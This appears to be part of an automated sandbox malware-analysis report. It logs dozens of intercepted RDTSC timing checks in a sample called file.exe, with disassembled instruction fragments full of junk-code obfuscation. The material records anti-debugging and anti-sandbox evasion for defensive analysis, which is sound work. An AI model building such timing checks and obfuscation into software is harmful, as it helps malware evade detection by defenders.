                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C55BD second address: 6C55CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C55CF second address: 6C5614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78ADB284h 0x00000008 jmp 00007FBF78ADB283h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007FBF78ADB27Ah 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b js 00007FBF78ADB27Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5614 second address: 6C5677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jl 00007FBF78E7B359h 0x0000000c and bh, FFFFFFA5h 0x0000000f jmp 00007FBF78E7B369h 0x00000014 push 00000000h 0x00000016 movsx ebx, bx 0x00000019 adc di, 0B1Eh 0x0000001e push 00000000h 0x00000020 movzx ebx, dx 0x00000023 mov bh, ah 0x00000025 xchg eax, esi 0x00000026 jng 00007FBF78E7B362h 0x0000002c jno 00007FBF78E7B35Ch 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FBF78E7B364h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5677 second address: 6C5685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF78ADB27Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C761D second address: 6C7654 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF78E7B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c add dword ptr [ebp+122D33B4h], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FBF78E7B358h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 push esi 0x00000032 push edi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C7654 second address: 6C7671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF78ADB283h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8707 second address: 6C870B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C870B second address: 6C8711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8711 second address: 6C8717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE7E7 second address: 6CE899 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB282h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jmp 00007FBF78ADB286h 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FBF78ADB278h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 and bl, FFFFFF8Eh 0x00000034 push 00000000h 0x00000036 pushad 0x00000037 or dword ptr [ebp+122D30F8h], ebx 0x0000003d mov bx, dx 0x00000040 popad 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ebx 0x00000046 call 00007FBF78ADB278h 0x0000004b pop ebx 0x0000004c mov dword ptr [esp+04h], ebx 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc ebx 0x00000059 push ebx 0x0000005a ret 0x0000005b pop ebx 0x0000005c ret 0x0000005d mov ebx, 596801C5h 0x00000062 xchg eax, esi 0x00000063 jo 00007FBF78ADB297h 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FBF78ADB289h 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CF7A5 second address: 6CF7AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FBF78E7B356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CA919 second address: 6CA944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBF78ADB286h 0x0000000a popad 0x0000000b push eax 0x0000000c jo 00007FBF78ADB284h 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007FBF78ADB276h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB96C second address: 6CB97E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF78E7B358h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CD980 second address: 6CD986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C985E second address: 6C9886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jmp 00007FBF78E7B365h 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 js 00007FBF78E7B356h 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D08F2 second address: 6D08F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9886 second address: 6C989F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF78E7B365h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D08F6 second address: 6D08FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D08FC second address: 6D0906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBF78E7B356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CDA39 second address: 6CDA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C989F second address: 6C990F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a jmp 00007FBF78E7B35Ah 0x0000000f pop edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 sbb di, 15EFh 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007FBF78E7B358h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d clc 0x0000003e mov eax, dword ptr [ebp+122D1171h] 0x00000044 jbe 00007FBF78E7B35Ch 0x0000004a mov edi, dword ptr [ebp+122D554Eh] 0x00000050 push FFFFFFFFh 0x00000052 mov edi, ecx 0x00000054 nop 0x00000055 js 00007FBF78E7B364h 0x0000005b pushad 0x0000005c jl 00007FBF78E7B356h 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CDA3D second address: 6CDA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C990F second address: 6C9921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF78E7B35Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CDA41 second address: 6CDA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CDA4D second address: 6CDA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0B05 second address: 6D0B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0B09 second address: 6D0B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0B0D second address: 6D0B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FBF78ADB27Ah 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5286 second address: 6D5295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FBF78E7B356h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D89BE second address: 6D89CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jno 00007FBF78ADB276h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D89CA second address: 6D89D4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF78E7B373h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC104 second address: 6DC108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC108 second address: 6DC11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF78E7B35Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB9FE second address: 6DBA21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB287h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA21 second address: 6DBA25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA25 second address: 6DBA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB284h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA3F second address: 6DBA5D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF78E7B35Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF78E7B35Ah 0x0000000f jnc 00007FBF78E7B356h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E0C12 second address: 6E0C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FBF78ADB27Ch 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 js 00007FBF78ADB289h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FBF78ADB27Fh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E0C6D second address: 6E0C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E0C73 second address: 6E0C8E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnl 00007FBF78ADB280h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4BA1 second address: 6E4BA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4E48 second address: 6E4E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4E4E second address: 6E4E7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f jmp 00007FBF78E7B363h 0x00000014 jl 00007FBF78E7B35Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4FE5 second address: 6E4FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4FE9 second address: 6E4FEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4FEF second address: 6E4FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E516D second address: 6E5186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007FBF78E7B356h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jng 00007FBF78E7B356h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E530A second address: 6E5326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FBF78ADB282h 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E549B second address: 6E54A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E54A2 second address: 6E54BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB287h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E54BF second address: 6E54CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jnl 00007FBF78E7B356h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDDB4 second address: 6BDDC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDDC2 second address: 6BDDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDDC7 second address: 6BDDD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78ADB27Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDDD8 second address: 69BED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 mov eax, dword ptr [ebp+122D3546h] 0x0000000f sub dword ptr [ebp+124570F6h], ebx 0x00000015 popad 0x00000016 call dword ptr [ebp+122D27FFh] 0x0000001c pushad 0x0000001d jmp 00007FBF78E7B360h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop eax 0x00000026 jc 00007FBF78E7B356h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE413 second address: 6BE428 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE428 second address: 6BE46F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FBF78E7B358h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 ja 00007FBF78E7B357h 0x0000002a push ABA60B8Fh 0x0000002f push eax 0x00000030 push edx 0x00000031 jno 00007FBF78E7B35Ch 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE46F second address: 6BE474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE71A second address: 6BE726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE726 second address: 6BE72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE72E second address: 6BE75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Dh 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jns 00007FBF78E7B35Eh 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a jns 00007FBF78E7B356h 0x00000020 pop esi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE75F second address: 6BE765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE765 second address: 6BE769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE9E5 second address: 6BEA74 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FBF78ADB278h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 pushad 0x00000027 jmp 00007FBF78ADB288h 0x0000002c push edx 0x0000002d jmp 00007FBF78ADB283h 0x00000032 pop edi 0x00000033 popad 0x00000034 push 00000004h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FBF78ADB278h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D30F8h], edi 0x00000056 nop 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a push esi 0x0000005b pop esi 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEA74 second address: 6BEA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEA78 second address: 6BEA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF78ADB281h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEA91 second address: 6BEAAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FBF78E7B356h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEE16 second address: 6BEE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEE1A second address: 6BEE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FBF78E7B358h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push 0000001Eh 0x00000024 cmc 0x00000025 nop 0x00000026 pushad 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c popad 0x0000002d jne 00007FBF78E7B358h 0x00000033 popad 0x00000034 push eax 0x00000035 pushad 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jmp 00007FBF78E7B369h 0x0000003e popad 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEE7E second address: 6BEE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEE82 second address: 6BEE86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF123 second address: 6BF12D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF12D second address: 6BF132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF132 second address: 6BF15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB289h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FBF78ADB276h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF15F second address: 6BF163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF163 second address: 6BF171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF171 second address: 6BF175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF175 second address: 6BF17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF17F second address: 6BF183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
